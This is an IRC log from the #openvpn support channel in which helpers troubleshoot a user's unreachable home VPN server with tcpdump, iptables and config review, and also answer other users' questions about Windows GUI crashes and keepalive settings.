using 18:26 < p0rk> udp 18:26 <+pekster> Okay. 'tcpdump -pnvi eth0 udp port 1194' on the server 18:27 < p0rk> port 1194, proto udp, dev tun0 18:27 < p0rk> ok 18:27 <+pekster> That'll watch for traffic on udp port 1194 across eth0 (change that to your LAN iface name if it's different) 18:27 < p0rk> then try to connect? 18:27 <+pekster> connect again from your client 18:27 <+pekster> Yes 18:27 < p0rk> ok 18:27 < p0rk> nadda 18:27 <+pekster> If tcpdump shows nothing, you have a firewall or routing problem (probably on your router, or upstream from that, such as your ISP) 18:27 < p0rk> the error i get is always "No connection could be made because the target machine actively refused it.." 18:28 < p0rk> i had openvpn working previously, i just got rid of the server and virtualized it 18:28 <+pekster> 'iptables-save' on the server was blank before, right? Full open with no rules and a policy of ACCEPT on INPUT? 18:28 < p0rk> i am authenticating differently, but apprently its not reaching that point nayway 18:28 < p0rk> that is correct 18:28 < p0rk> should i run it on the router? 18:28 <+pekster> No need if you can properly port forward stuff 18:28 <+pekster> Or you mean tcpdump? 18:29 < p0rk> no, i meant iptables-save 18:29 <+pekster> Sure, post that if you can get a shell and have iptables-save 18:29 < p0rk> dur 18:29 < p0rk> it doesnt have iptables-save 18:29 <+pekster> I can use iptables output too, but iptables-save is highly preferred 18:29 <+pekster> Lovely 18:29 <+pekster> Go smack the dd-wrt folks for me 18:29 < p0rk> id love to 18:29 < p0rk> i can do iptables -nL but i know you dont like that 18:29 < p0rk> although it pretty lengthy 18:29 <+pekster> Better way to do that: 18:30 <+pekster> for table in nat mangle filter; do echo "* TABLE: $table"; iptables -t $table -nvL; done 18:30 < p0rk> just c/p that entire line? 18:30 <+pekster> Sure 18:30 < p0rk> it scrolled pages of crap 18:30 < p0rk> lol 18:31 <+pekster> It's similar to (but not nearly easy to read as) iptables-save 18:31 < walp> ok, and duplicate-cn 18:31 <+pekster> It's just stupid to include iptables but not iptables-save on hosts 18:31 < p0rk> yea 18:31 < walp> i would put that in server.conf in order to have multiple machines with the same cert be able to connect 18:31 < walp> e.g. desktop and laptop 18:31 <+pekster> walp: Yup 18:31 < walp> cool 18:31 <+pekster> Ideally you use different certs for that 18:32 <+pekster> But duplicate-cn is there if you can't/won't do that 18:32 <+pekster> No real reason besides a compromise of one cert inherently breaks the other. (Oh, and ccd entries are based on CN, so you can't do static addressing without unique CNs) 18:32 < p0rk> pekster, i do see the entry for 1194 on my router in the output of you rcommand 18:32 < walp> gotcha 18:32 < p0rk> under chain forward 18:32 < p0rk> 0 0 logaccept tcp -- * * 0.0.0.0/0 192.168.1.101 tcp dpt:1194 18:32 < p0rk> 0 0 logaccept udp -- * * 0.0.0.0/0 192.168.1.101 udp dpt:1194 18:32 <+pekster> Post the whole thing as it could still be a firewall issue 18:33 < p0rk> ok 18:33 < p0rk> i dont have a firewall though 18:33 <+pekster> I have no idea what the 'logaccept' chain is doing, where it's called from, or how that relates to your NAT 18:33 <+pekster> netfilter *is* the firewall 18:33 < p0rk> gotcha 18:33 < p0rk> let me pastie it all 18:33 <+pekster> You can't have NAT without a firewall 18:33 <+pekster> It may be very permissive, but it is still a firewall 18:33 < walp> iptables -vnL 18:33 < p0rk> i worded it wrong 18:33 < walp> paste that to pastebin :) 18:33 <+pekster> walp: I alreaady got it covered with all 3 standard chains 18:34 <+pekster> It's critical to get nat too, which is why iptables -L sucks. dd-wrt sucks too for not including iptables-save, but I'll try to contain myself... 18:34 < p0rk> http://pastie.org/private/s3xamqar5gwbtnhp7oty8g 18:35 <+pekster> That's just filter 18:35 <+pekster> I need nat too 18:35 < p0rk> doh 18:35 < walp> -t nat 18:35 <+pekster> Might as well post mangle too, just in case the distro does silly things there 18:35 < p0rk> so what command do you want to see the entire output of? 18:35 < p0rk> that for loop? 18:35 <+pekster> walp: Check my bash loop above for a "poor man's iptables-save" version 18:35 < walp> ah ya 18:36 <+pekster> yes 18:36 < walp> for t in {nat,mangle,filter}; do iptables -vnL INPUT -t $t; done 18:36 < p0rk> i gotta figure out how to increase the buffer 18:36 < p0rk> it spits out too much 18:36 <+pekster> Dump it to a file and scp it over 18:36 < walp> or install wgetpaste and pipe it 18:36 -!- nickanderson_afk is now known as nickanderson 18:37 < p0rk> im stupid. how do i dump it to a file? 18:37 < walp> command > file.txt 18:37 < p0rk> but in that for loop, where do i do it? 18:37 < walp> at the end 18:37 <+pekster> Well, the loop can be changed like this, assuming you want it to /tmp/output.txt 18:37 < p0rk> for table in nat mangle filter; do echo "* TABLE: $table"; iptables -t $table -nvL > output.txt; done 18:37 < p0rk> ? 18:37 <+pekster> nope, not for the bash 18:37 < walp> no, after done 18:37 <+pekster> for table in nat mangle filter;iptables -t $table -nvL >> /tmp/output.txt; done 18:37 <+pekster> walp: Not helpful 18:38 -!- eN_Joy [~eN_Joy@jindan.chem.ou.edu] has quit [Ping timeout: 264 seconds] 18:38 < p0rk> you 2 are contradicting yourselves so much 18:38 < p0rk> lol 18:38 <+pekster> p0rk: Follow my instructions, since they'll actually work 18:38 < p0rk> i am 18:38 < p0rk> but yours throws an error about word unexpected 18:38 < p0rk> expecting do 18:38 <+pekster> Oh, ugh, editng crap in irssi not convenient 18:38 <+pekster> for table in nat mangle filter;do iptables -t $table -nvL >> /tmp/output.txt; done 18:38 < walp> pekster: story of my life lol 18:39 < p0rk> ok 18:39 <+pekster> Then scp over /tmp/output.txt and drop that somewhere 18:39 < p0rk> how do i use scp? :-X 18:39 < walp> oboy 18:39 < p0rk> yea 18:39 < p0rk> im embarassed 18:39 <+pekster> scp root@router_ip:/tmp/output.txt ./ 18:39 <+pekster> Assuming the root user and a default ssh port 18:40 < p0rk> port 2222 18:40 <+pekster> scp -P 2222 root@router_ip:/tmp/output.txt ./ 18:40 < p0rk> oh i run that from a server other than the router? 18:40 <+pekster> Anything that has 'scp' avaibale. putty's pscp.exe works too 18:40 < walp> yeah, you're pulling that from your machine 18:41 < walp> if you're root on the machine with the firewall, you could also email it to yourself 18:41 <+pekster> Optionally, just upload 'iptables -t nat -nvL' somewhere, since I already have filter 18:41 < p0rk> ok, i got it 18:41 < p0rk> http://pastie.org/private/dzddbyllrqzyhnp0bsphq 18:41 < p0rk> im digging scp, thanks for that tip 18:42 <+pekster> Holy crap those are ugly rules 18:42 < p0rk> ill forget my anniversary and replace it with scp in the memory bank 18:42 <+pekster> You really need all those random high UDP ports forwarded? 18:42 < p0rk> those are dd-wrt rules 18:42 < p0rk> *shrug* 18:42 < p0rk> i dont know where they came from 18:42 < p0rk> in my dd-wrt interface i only have 8 forwards setup 18:43 <+pekster> You're sending udp/1194 traffic to a public IP 18:43 <+pekster> That's probably not what you wanted 18:43 < p0rk> i dont know how that is happening 18:43 <+pekster> And also why your server never gets them on a rfc1918 LAN 18:43 < p0rk> im about to wipe this router and reinstall dd-wrt 18:43 <+pekster> Yea, your rules look really hosed 18:43 < p0rk> is there like a factory reset for dd-wrt? 18:43 < p0rk> to get back to bone stock? 18:44 <+pekster> Unless you're able to fix your router yourself, yea 18:44 <+pekster> That DNAT target matches the IP you've connected here with, so that makes no sense at all 18:44 < p0rk> or maybe just reset the iptables? 18:44 <+pekster> Sure. I don't use dd-wrt, so I'm not sure how you clean-house on that OS 18:45 < p0rk> hmm 18:45 <+pekster> Oh, hold on a sec 18:45 < p0rk> ok 18:45 * walp waits for ping timeout 18:45 < p0rk> from me? 18:45 < p0rk> i noticed ive been dropping randomly 18:45 <+pekster> I'm mis-reading that (used to iptables-save, not -L) 18:45 < p0rk> ah 18:45 <+pekster> So, the nat entry appears okay actually, but it's not getting hit 18:46 <+pekster> (you still have a mess of other high random ports, but you can leave that in if you'd like, I guess) 18:46 <+pekster> So that router isn't even seeing inbound packets from your client 18:46 < p0rk> what the shit 18:46 <+pekster> Either the client isn't actually send it to your IP, or your ISP drops it 18:46 < p0rk> my other port forwards work though 18:46 < p0rk> for ssh, web, etc 18:46 <+pekster> Right. tcp/5222 is getting hit 18:46 <+pekster> See the hit counter is >0 18:46 < p0rk> my jabber server works 18:46 <+pekster> But not for the 1194 port 18:46 <+pekster> Right 18:46 < p0rk> http://www.dd-wrt.com/wiki/index.php/Hard_reset_or_30/30/30 18:47 <@vpnHelper> Title: Hard reset or 30/30/30 - DD-WRT Wiki (at www.dd-wrt.com) 18:47 < p0rk> im bout to try that hard reset 18:48 <+pekster> It won't hurt to get your rules to have less crap in them, but it probably won't fix the VPN packets getting lost 18:48 < p0rk> or maybe that second one 18:48 <+pekster> Your rules are a mess, but do appear to allow udp/1194 to be sent to 192.168.1.101 18:48 <+pekster> They just aren't arriving 18:48 < p0rk> but it doesnt look like it actually is 18:48 < p0rk> right 18:48 < walp> never heard of an ISP denying inbound VPN 18:48 < p0rk> its not my isp 18:49 <+pekster> Differnet IP 18:49 < p0rk> ive had it working before 18:49 <+pekster> The IP in your client config doesn't match the dst IP of those rules (which is also your IRC src IP) 18:49 <+pekster> DHCP residential customer I'm guessing? 18:49 <+pekster> Try a dynamic DNS service 18:49 < p0rk> yes 18:49 < p0rk> i have dynamic dns 18:49 < p0rk> i use afraid.org 18:49 <+pekster> http://pastie.org/pastes/6083496/text?key=fasfjxaz39bvzyshrnzp7q doens't use it 18:49 < walp> ^ gives you the highest of fives 18:49 <+pekster> You're connecting to some other random IP 18:50 < p0rk> pekster, thats not my config 18:50 < walp> that's mine 18:50 <+pekster> Oh, whopsie :\ 18:50 <+pekster> so, is your client using that IP, or a DNS name that resolves to it? 18:50 < p0rk> want me to pastie mine? 18:51 < p0rk> my client is using a domain 18:51 < p0rk> that resolves correctly 18:51 < p0rk> same domain i use for web and ssh 18:51 < p0rk> http://pastie.org/private/x8bisl6lbvephop7h6qtw 18:51 < p0rk> thats my config 18:51 < p0rk> i got from fys 18:51 < p0rk> earlier today 18:52 <+pekster> client resolves the IP listed in those iptables rules? 18:52 <+pekster> Correct? 18:52 < p0rk> client resolves the ip im connected here with 18:52 < p0rk> my domain is n0sha.me 18:53 < walp> lol 18:53 <+pekster> Then another firewall between your router and client is blocking it 18:53 < p0rk> you can pull it up in a browser and it goes to an apache instance on the same server as the vpn 18:53 <+pekster> Could be the client, or it could be someone's ISP 18:53 <+pekster> And yea, that DNS entry resolves properly 18:53 < p0rk> i really think this is a bitched up router problem 18:53 < p0rk> ive tried from work, my dads house and my house 18:53 < p0rk> same problem everywhere 18:53 < walp> p0rk: try this from the client nc -u -v n0sha.me 1194 18:53 <+pekster> Could be that too. As I said, the actual ruleset *looks* okay, but it's messy as all gettup 18:54 < walp> n0sha.me [67.235.87.119] 1194 (openvpn) open 18:55 < p0rk> walp, ? 18:55 < walp> i can connect from my server to your vpn via udp packet to 1194 18:56 <+pekster> Or at least "something" on that IP. if the dnat hitcounter isn't going up it's not actually that host 18:56 < p0rk> the hell? 18:56 -!- midgaze [~mreid@155.229.21.75] has joined #openvpn 18:56 < walp> i can't authenticate obviously 18:56 <+pekster> p0rk: If you do 'iptables -t nat -nvL PREROUTING' do you see a hitcount >0 on the udp 1194 rule? 18:56 < p0rk> yea 18:56 < p0rk> that wasnt to you 18:56 < p0rk> lety me check 18:56 < p0rk> wheres the hitcount? 18:57 < walp> pkts 18:57 <+pekster> I'm also registering the port as (likely) opened, compared to active refusals on other ports: http://fpaste.org/CyoQ/ 18:57 < p0rk> 0's 18:57 <+pekster> Funny 18:57 <+pekster> So "something else" is eating the packets 18:58 < p0rk> wait 18:58 < p0rk> i have 2 different lines for that port 18:58 < p0rk> the bottom one is 0's 18:58 < p0rk> but up further is another one where UDP is 7 18:58 < walp> paste those linse 18:59 < p0rk> 7 197 DNAT udp -- * * 0.0.0.0/0 67.235.87.119 udp dpt:1194 to:192.168.1.101:1194 18:59 <+pekster> Okay, so that's probably from our connect attempts 18:59 <+pekster> So we can "get through" to your port 18:59 <+pekster> Assuming we stop trying now, you should see that go up when the client connects 18:59 <+pekster> If it doesn't, your client is never making it to your IP 18:59 <+pekster> The good news is that your tcpdump rule on that server will show such inbound traffic 19:00 <+pekster> (no need to use the hitcounters as a "poor man's tcpdump" 19:00 < walp> lolz 19:00 <+pekster> walp: I'm very good at abusing resources when the proper tools don't exist... 19:00 < walp> you'd have to be really poor i guess, tcpdump is free lol 19:00 <+pekster> targetless rules in the raw chain are quite helpful 19:00 <+pekster> Not free if you don't have a package for it (or space to install it on a router) 19:00 <+pekster> bytes are expensive sometimes 19:01 < walp> yeah tru 19:01 <+pekster> raw table, that is 19:02 <+pekster> p0rk: So, watch that tcpdump output (or the hitcounters on the router if you'd prefer) and if nothing happens when the client connects, it's getting rejected before it even comes to you. Could be a client firewall stopping it, or any router between you and them 19:02 <+pekster> tcpdump the output interface of the client (wireshark if it's Windows) and that'll tell you if it's even leaving the client 19:03 < p0rk> back, sorry, kid needed attention 19:03 < walp> also, if you can, run `tcpdump -vv -nn dst port 1194` on the endpoint behind your router on the 192 IP 19:03 <+pekster> Best to use -p always when dumping 19:03 <+pekster> (unless you actually want PROMISC mode, it's best not to enable it on an interface that lacks it) 19:03 < p0rk> so i shoudl try to connect and that 7 should go to 8? 19:04 < p0rk> its still 7 19:04 <+pekster> p0rk: Right. Or use the tcpdump rule on the server such as: tcpdump -pnvi eth0 udp port 1194 19:04 < p0rk> let me get my dad to try quick from his house 19:04 <+pekster> So, check your client as I said above 19:04 <+pekster> Are you doing this from inside your own network? 19:04 < p0rk> yea 19:04 < p0rk> im gonna have my dad try from outside 19:04 <+pekster> Should've asked that a while back. You can't do that 19:04 * walp goes to find butter knife 19:04 < p0rk> i was able to connect from within my network the last time 19:04 < p0rk> and i tried all day at work as well 19:05 <+pekster> Not with your current ruleset you can't 19:05 <+pekster> asymettric routing 19:05 < p0rk> ok 19:05 < p0rk> im having my old man give it awhirl 19:05 <+pekster> Use your internal LAN IP if you want to "test" it, but you can't really do it like that and assume it work from outside 19:06 < p0rk> ok, my dad just tried and its still 7 19:07 < p0rk> ok, my dad just tried and its still 7 19:07 < p0rk> doh 19:08 < p0rk> is it worth changing the port to something else and trying? 19:09 <+pekster> One sec; I'm gunna try hitting your service with a bogus config on my end 19:09 < p0rk> ok 19:09 <+pekster> It won't accept your cert, but it'll show I can hit it fine 19:09 <+pekster> (that'll confirm it's an issue on your client end. I can nmap your port, so can walp, so it's obviously open 19:09 -!- StoneCypherAtWor [~StoneCyph@c-69-181-69-19.hsd1.ca.comcast.net] has joined #openvpn 19:09 < p0rk> ok 19:09 < StoneCypherAtWor> So I think I might be missing something about openvpn 19:10 < StoneCypherAtWor> I'm having that problem where I need everything to run elevated, except, if I run openvpn.exe directly as administrator, it doesn't know where the .ovpn config is, and if I run from the .ovpn file to start OpenVPN, it doesn't run as administrator 19:10 < StoneCypherAtWor> I ran OpenVPN-GUI as admin, but it seems to be a background process, and I'm not seeing an actual GUI 19:11 -!- nickanderson is now known as nickanderson_afk 19:11 < p0rk> pekster, that 7 is now a 15 19:11 <+pekster> THat was me 19:12 < p0rk> what the hell? 19:12 < StoneCypherAtWor> oh wait, i can just do it from a batch file and elevate the batch file, can't i 19:12 <+pekster> I can connect fine, and then of course my client rejects your server's cert (it doesn't match the fake CA I used) and cycles 19:12 < p0rk> am i using an old client maybe? 19:12 <+pekster> Your client's data isn't even getting to your serfer 19:12 <+pekster> It's not even a problem about version at this point 19:12 <+pekster> Firewall 19:12 <+pekster> It's a firewall *somewhere* 19:12 < p0rk> but how are you able to do it? 19:13 < p0rk> but i cant from every location i try? 19:13 < p0rk> should i try a different port? 19:14 <+pekster> No clue. Sure, if you'd like 19:14 <+pekster> The problem is between the client and your router (but not your router itself) 19:14 < p0rk> when i change ports, do i just connect via domain:port in the openvpn client then? 19:14 <+pekster> My config looks like this, and I can reach your system just fine: http://fpaste.org/Mgqo/ 19:14 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:14 <+pekster> Obviously that's not valid (my ca.crt doesn't match your actual CA) but I am connecting to your server with that 19:15 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 19:15 < p0rk> ok wait 19:15 <+pekster> If you keep logs you'll see some hits for a failed login with a "bogus" user 19:15 <+pekster> (that was me) 19:15 < p0rk> where does your client config come from? 19:15 < p0rk> thats probably the friggin problem 19:15 <+pekster> huh? It comes from my text editor ;) 19:15 < p0rk> i thought i only needed a server cert to connect 19:16 <+pekster> StoneCypherAtWor: OpenVPN GUI sits in your system tray when started 19:16 < p0rk> my clients are all windows clients 19:17 < p0rk> so i need a config file dropped into program files/openvpn/config? 19:17 < p0rk> along with ca.crt? 19:17 <+pekster> StoneCypherAtWor: If you want the UI frontend for Windows, start the GUI with elevated priveleages. It reads configs out of \config\ 19:17 <+pekster> Actually that applies to you too then p0rk 19:17 <+pekster> Yes 19:17 < p0rk> that is 100% the problem 19:17 <+pekster> Technically you can call openvpn.exe manually and point it at a config file, but the GUI thing expects the config files to live in the path I just noted 19:17 < p0rk> none of the machines itried from have client configs 19:17 < p0rk> just the ca.crt 19:18 <+pekster> Then how the heck do you expect them to connect? 19:18 < p0rk> *sigh* 19:18 < p0rk> i dont know 19:18 <+pekster> !sample 19:18 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 19:18 <+pekster> !howto 19:18 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 19:18 < p0rk> i feel like the biggest dumbass 19:18 <+pekster> You need to follow those more carefully 19:20 <+pekster> Don't just copy my config since it won't match your setup 19:20 < p0rk> i know 19:20 < p0rk> im trying tio find how to make one 19:20 <+pekster> k, just in case, I figured I'd warn you about that 19:20 < StoneCypherAtWor> per: oh, so it does 19:21 < StoneCypherAtWor> and it crashes when i try to connect. 19:21 < StoneCypherAtWor> hurrah. 19:21 < StoneCypherAtWor> is openvpn-gui known to work in win8? 19:22 <+pekster> Yup. You on 2.3.0? 19:23 < StoneCypherAtWor> uh. about box doesn't say. re: gui or re: openvpn? 19:23 <+pekster> OpenVPN 19:23 <+pekster> Your installed programs control thingy should know 19:23 <+pekster> or openvpn.exe --version 19:24 < StoneCypherAtWor> yes 19:24 < StoneCypherAtWor> 64 bit mingw32 build 19:24 <+pekster> I ran both 32 and 64-bit versions in the win8 developer preview fine, and people hare have used it on RTM, so it doesn't crash across the board 19:24 < StoneCypherAtWor> k. 19:24 <+pekster> Not to say there isn't something else wrong on your end. Is it consistent? If so, try uninstall and reinstalling (it'll save your config files when you do that) 19:25 <+pekster> Failing that, try the 32-bit version I guess... 19:25 < StoneCypherAtWor> well, i'll have to reboot; after the crash it doesn't seem to want to tlak again 19:25 < p0rk> pekster, since im using client-cert-not-required and username-as-common-name do i still need the declarations in the client config for anything other than ca.crt? 19:25 < StoneCypherAtWor> bbiab 19:25 -!- StoneCypherAtWor [~StoneCyph@c-69-181-69-19.hsd1.ca.comcast.net] has quit [] 19:25 <+pekster> StoneCypherAtWor: Oh, maybe just the GUI crahsed 19:25 <+pekster> p0rk: No need for cert or key, no 19:25 < p0rk> ok 19:26 < p0rk> can you look at my client config for me? 19:26 <+pekster> p0rk: See my config for a sample reference. You don't want any of the cipher/auth/keysize/tran-window crap. Or the cd line. You DO want MITM protection: 19:26 <+pekster> !mitm 19:26 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config 19:26 <+pekster> Sure, paste it and I'll have a look 19:26 < p0rk> http://pastie.org/private/9rfmk2wwpfcipy7goby6a 19:27 <+pekster> You need at minimum 'pull' in there to. Optionally, use 'client' which implies pull and tls-client 19:27 < p0rk> just replace tls-client with client? 19:27 <+pekster> Sure 19:27 <+pekster> (it's a helper directive. See --client in the manpage) 19:28 < p0rk> otherwise everything is ok? 19:28 <+pekster> Minus your lack of MITM protection, yes. I guess since you don't issue client certs you can't really care about that 19:29 <+pekster> (if you ever did issue a client cert, that would be a potential security issue. See the bot output above for why) 19:29 < p0rk> ok 19:29 < p0rk> hm 19:29 < p0rk> still nothing 19:29 < p0rk> im having my dad do it 19:29 <+pekster> !forget mitm 3 19:29 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 19:30 <+pekster> p0rk: You probably need to use a full path to ca.crt 19:30 <+pekster> Unless it's in whatever dir the GUI chdir's to 19:30 -!- StoneCypherAtWor [~StoneCyph@c-69-181-69-19.hsd1.ca.comcast.net] has joined #openvpn 19:30 < StoneCypherAtWor> so 19:30 <+pekster> Usually ca "C:\\some\\where\\ca.crt" 19:30 < StoneCypherAtWor> yes, openvpn-gui crashes regularly, but it establishes the connection successfully before it goes 19:30 < StoneCypherAtWor> which, i guess, is good enough 19:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 19:31 <+pekster> StoneCypherAtWor: Yea, I suspected that moments after you left to reboot. Sort of weird. Maybe you can try an uninstall/reinstaill (it'll save your config files) or try the 32-bit version of that fails? 19:31 < p0rk> something still isnt right 19:31 <+pekster> Once in a blue moon my GUI will crash like you said (openvpn.exe lives on) but it's very rare for me. Not at all consistent or reproducable 19:31 < p0rk> im not seeing the hitcount go up when my dad does it like it did for you 19:32 <+pekster> p0rk: Did you actually send the ca.crt and verify the path to it was correct? 19:32 < StoneCypherAtWor> pekster: i will, but not today - i have to get something done very rapidly 19:32 < p0rk> yes 19:32 < p0rk> he has client.conf and ca.crt in his config directory of his client 19:33 <+pekster> Client logs at verb 4 are the next step. If the client won't connect it'll say why (or a timeout will occur after 60 seconds of trying) 19:33 < p0rk> it just gives the same old error it always has 19:33 < p0rk> woah 19:33 < p0rk> wait 19:34 < p0rk> Unable to obtain Session ID from n0sha.me:443: XML-RPC: ConnectionRefusedError: 10061: No connection could be made because the target machine actively refused it.. 19:34 < p0rk> that says port 443 19:34 <+pekster> Wrong config then 19:34 < p0rk> how the hell? 19:35 <+pekster> The GUI doesn't like to pick up changes to >1 configs unless you restart it 19:35 <+pekster> You're clearly using the wrong config file, which also explains why it failed to connect before 19:36 < p0rk> what other config would it use? 19:36 < p0rk> i dont have another one 19:36 <+pekster> StoneCypherAtWor: Fair enough. If you ask taskmanager to kill the openvpn.exe process, I *think* it asks nicely before killing it more hastely, so it should even shut down clean for you when you're done 19:36 <+pekster> p0rk: It's apparently using another config bound for 443 19:36 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Read error: Connection reset by peer] 19:37 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn 19:37 < p0rk> ok, now the hit counter is going up 19:38 < p0rk> but im getting the same error 19:38 < p0rk> but the port is right 19:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 19:40 <+pekster> If the hitcount goes up it shouldn't be rejecting you based on "actively refused" anymore 19:40 < p0rk> finally got it 19:41 < p0rk> the directions on the website are wrong 19:41 < p0rk> its not client.conf 19:41 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn 19:41 <+pekster> That's for Linux/Unix 19:41 <+pekster> howto guide is 100% correct 19:41 <+pekster> If you followed a different guide, perhaps it's wrong 19:42 <+pekster> reference: http://openvpn.net/index.php/open-source/documentation/howto.html#config 19:42 <@vpnHelper> Title: HOWTO (at openvpn.net) 19:42 < p0rk> yea i must have 19:42 <+pekster> "Note that on Linux, BSD, or unix-like OSes, the sample configuration files are named server.conf and client.conf. On Windows they are named server.ovpn and client.ovpn." 19:43 * p0rk slits wrist 19:44 <+pekster> Just follow the guides more carefully next time. In most cases it's rarely that someone discovered a new bug (although sometimes that happens too. Just rarely.) 19:45 < p0rk> thank you soooo much pekster 19:46 < p0rk> i appreciate you help and patience 19:46 -!- raidz is now known as raidz_away 19:53 < p0rk> so my dad is connected in, but he cant access any machines on my lan 19:53 < p0rk> is that because it put him on a 10.0. ip and everything is on 192.168? 19:54 -!- StoneCypherAtWor [~StoneCyph@c-69-181-69-19.hsd1.ca.comcast.net] has quit [] 20:08 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 20:13 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 20:15 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:17 <+pekster> p0rk: 20:17 <+pekster> !serverlan 20:17 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 20:18 -!- mode/#openvpn [-v pekster] by ChanServ 20:31 < p0rk> ok 20:31 < p0rk> i enabled ip forwarding 20:32 < p0rk> and i changed my push line to read: 20:32 < p0rk> push "route 192.168.1.0 255.255.255.0" 20:32 < p0rk> my servers are all on 192.168.1.* addresses on my local lan 20:32 < p0rk> so that should do it, right? 20:42 -!- jforman [~jforman@unaffiliated/jforman] has joined #openvpn 20:42 < jforman> hi all. i've recently been seeing lots of entries in my openvpn server log that look like "IP packet with unknown IP version=15 seen". no src or destination listed. is there a tcpdump flag i can use to figure out what might be causing these entries? 20:49 < p0rk> i added those settings, enabled ip forwarding, set eth0 into promiscuous mode but my client cant still not see any other servers on the lan 20:49 < p0rk> please help 21:09 < p0rk> do i also need the push command in my client config? 21:26 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 248 seconds] 21:27 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 21:33 * ecrist looks in 22:05 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 255 seconds] 22:16 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 22:22 -!- James_V [~textual@72.37.128.164] has joined #openvpn 22:26 -!- James_V [~textual@72.37.128.164] has left #openvpn ["Textual IRC Client: www.textualapp.com"] 22:30 -!- TheLaw [~law@irc.l4w.info] has quit [Ping timeout: 248 seconds] 22:32 -!- TheLaw [~law@irc.l4w.info] has joined #openvpn 22:43 -!- ura [~ura@unaffiliated/ura] has quit [Quit: Leaving] 22:47 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 23:27 -!- mode/#openvpn [+v pekster] by ChanServ 23:27 <+pekster> p0rk: Don't use promisc. You probably need your firewall fixed 23:29 <+pekster> jforman: Is that a tap or tun setup? 23:44 <+pekster> Then you failed to follow the flowchart you were linked 23:44 <+pekster> Erm, bad paste 23:45 <+pekster> jforman: Near as I can tell, that will occur in a tap setup when an Ethernet packet has an invalid IP protocol field. You can try something like 'tcpdump -pnvi tap0 not ip and not ipv6' perhaps? 23:54 -!- RealRancor [~chris@p5B13CB37.dip0.t-ipconnect.de] has joined #openvpn --- Day changed Thu Feb 07 2013 00:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Quit: off to do some thoughtcrime] 00:11 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 00:27 < RealRancor> Hi everyone. Just a short question: Is the debian package available here: http://repos.openvpn.net/repos/apt/squeeze-snapshots/ a real snapshot or the final of openvpn 2.3.0 and just at the wrong place? 00:27 <@vpnHelper> Title: Index of /repos/apt/squeeze-snapshots/ (at repos.openvpn.net) 00:30 <+pekster> RealRancor: looks like 2.3.0 final based on timestamps of the other formal releases that were all signed on that same date 00:35 < RealRancor> pekster: Yes, noticed the same. But i wasn't really sure. 00:37 < RealRancor> There is an entry in the changelog of this package: "Preparing for v2.3.0 (David Sommerseth, d690047)", so i wasn't really sure if this is the final. 01:00 -!- cosmicgate [~root@94.249.242.85] has joined #openvpn 01:03 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:07 -!- hid3 [~arnoldas@78.157.71.116] has joined #openvpn 01:07 < hid3> Hello everyone. I need to run OpenVPN on a really old/slow CPU. Is there any way I can reduce CPU usage and gain some performance? I have already turned off the compression. Is there any way to lower the encryption level so that I'll save a few more CPU cycles? 01:10 < cosmicgate> get a ssd 01:11 < hid3> Any real advice? 01:12 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has joined #openvpn 01:13 < JyZyXEL> what kind of settings do i need to have automatic reconnecting for a client that uses wifi that can sometimes drop out? 01:20 <+pekster> JyZyXEL: --ping and --ping-restart 01:20 <+pekster> See the manpage for those (or the --keepalive) option. See also: 01:20 <+pekster> !keepalive 01:20 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 01:27 -!- ade_b [~Ade@95.209.143.40.bredband.tre.se] has joined #openvpn 01:27 -!- ade_b [~Ade@95.209.143.40.bredband.tre.se] has quit [Changing host] 01:27 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 01:28 -!- RealRancor2 [~Rancor3@mafiaforum.de] has joined #openvpn 01:30 < cosmicgate> hid3:get a ssd 01:31 <+pekster> That won't help CPU consumption... 01:31 -!- cosmicgate [~root@94.249.242.85] has quit [] 01:32 -!- RealRancor 